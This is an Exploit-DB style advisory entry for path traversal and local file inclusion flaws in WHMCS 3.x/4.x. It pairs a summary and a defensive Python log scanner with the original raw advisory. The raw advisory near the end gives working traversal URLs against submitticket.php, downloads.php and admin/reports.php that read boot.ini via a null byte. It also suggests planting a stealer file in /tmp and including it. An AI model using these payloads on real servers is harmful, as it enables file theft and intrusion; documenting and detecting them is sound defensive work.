Vendor: WHMCompleteSolution
By: ZxH-Labs
CVSS: 7.5 (HIGH)
Type: Local File Disclosure, Local File Include
CWE: 22, 98
Product Name: WHMCompleteSolution
Affected Version From: 3.x
Affected Version To: 4.x
Patch Exists: NO
Related CWE: N/A
CPE: a:whmcs:whmcs
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows IIS 6.0
2011

WHMCS ( WHMCompleteSolution ) 3.x / 4.x Multiple Vulnerability

WHMCS (WHMCompleteSolution) 3.x / 4.x contains multiple vulnerabilities that allow an attacker to gain access to sensitive files on the server. In the first, submitticket.php is requested with an unknown value in the step parameter and the path to the boot.ini file in the templatefile parameter. In the second, downloads.php is requested with an unknown value in the action parameter and the path to the boot.ini file in the templatefile parameter. In the third, reports.php is requested with the path to the boot.ini file in the report parameter. In each example in the raw advisory below, the path is a ../ traversal sequence ending in a %00 null byte.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all files are properly secured and that access to sensitive files is restricted to only authorized users.
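
A log check for the three request patterns described above, as an added example that is not part of the original advisory or of WHMCS: it flags requests where templatefile or report carries a null byte, a .. path segment or an absolute path. The log layout (request line in double quotes), the sample lines and the report name monthly_summary are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Script -> file-selecting parameter, taken from the advisory text.
WATCHED = {"submitticket.php": "templatefile", "downloads.php": "templatefile",
           "reports.php": "report"}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Nov/2011:10:00:01 +0000] "GET /submitticket.php?step=2&deptid=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Nov/2011:10:00:09 +0000] "GET /submitticket.php?step=b0x&templatefile=../../../../../../../../../boot.ini%00 HTTP/1.1" 200 211',
    '198.51.100.7 - - [01/Nov/2011:10:00:12 +0000] "GET /downloads.php?action=b0x&templatefile=../../../../../../../../../boot.ini%00 HTTP/1.1" 200 211',
    '198.51.100.7 - - [01/Nov/2011:10:00:15 +0000] "GET /admin/reports.php?report=../../../../../../../boot.ini%00 HTTP/1.1" 200 211',
    '192.0.2.10 - - [01/Nov/2011:10:00:20 +0000] "GET /admin/reports.php?report=monthly_summary HTTP/1.1" 200 9000',
]


def classify(value, rounds=3):
    """Return the reasons a parameter value looks like a path, not a name."""
    for _ in range(rounds):  # undo nested percent-encoding, bounded
        value = unquote(value)
    value = value.replace("\\", "/")  # treat Windows separators the same way
    checks = {"null-byte": "\x00" in value,
              "traversal": ".." in value.replace("\x00", "").split("/"),
              "absolute-path": bool(re.match(r"/|[A-Za-z]:", value))}
    return [name for name, hit in checks.items() if hit]


def scan(lines):
    """Return (line_no, script, param, reasons) for each suspicious request."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        script = url.path.rsplit("/", 1)[-1].lower()
        # Split the raw query by hand so %00 reaches classify() undecoded.
        for pair in url.query.split("&"):
            key, _, raw = pair.partition("=")
            if key == WATCHED.get(script) and (reasons := classify(raw)):
                hits.append((no, script, key, reasons))
    return hits


if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Parameters sent in a POST body do not appear in access logs, so this check only covers query strings.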

Exploit-DB raw data:

$b0x#  WHMCS ( WHMCompleteSolution )  3.x / 4.x  Multiple Vulnerability !
$b0x#  ZxH-Labs
$b0x#  1st-NOV-11
$b0x#  Www.Sec4ever.coM 
$b0x#  WH-03 On Windows IIS 6.0

========================================================
b0x@1337b0x:/b0x/Exploits/WebAPP# whoami
ZxH-Labs | Www.Sec4ever.coM
b0x@1337b0x:/b0x/Exploits/WebAPP# cat WH-03.XPL

EXPL Type : Local File Disclosure
              
Files : Submitticket.php , Downloads.php

       -> I: submitticket.php?step=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00
             EX : submitticket.php?step=b0x&templatefile=../../../../../../../../../boot.ini%00

       ->II: downloads.php?action=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00
            EX : downloads.php?action=b0x&templatefile=../../../../../../../../../boot.ini%00


b0x@1337b0x:/b0x/Exploits/WebAPP#
b0x@1337b0x:/b0x/Exploits/WebAPP#  cat WH-03.bug

Bug TYPE : Local File Include
Bug File : Reports.php

             -I : reports.php?report=[LFI]%00
                EX : admin/reports.php?report=../../../../../../../boot.ini%00
           
               You Can Use This Bug When You Get Forbidden Access In Lux Symlink !
            However You Can Make Stealer into "/tmp" Directory With EXT .htm And The Full ISSUE Will Be
                  -FI : admin/reports.php?report=../../../../../../../tmp/b0x.htm%00
              And Don't Forget To Use IFRAME With Evil Code'z =))


b0x@1337b0x:/b0x/Exploits/WebAPP# Logout
========================================================
$b0x# Greet'z 2 T0R0B0XHACKER | X-Shadow | Sec4ever |  TNT_HACKER | r1z | Tw1st3r | S4S
Cyb3r-1st | Red Virus | I-Hmx | h311 c0d3 | TacticiaN  | Th3MMA | FreeMan(LY) | Ma3stro_DZ
Mr.L4iv3  And All Q8'z 

./b0x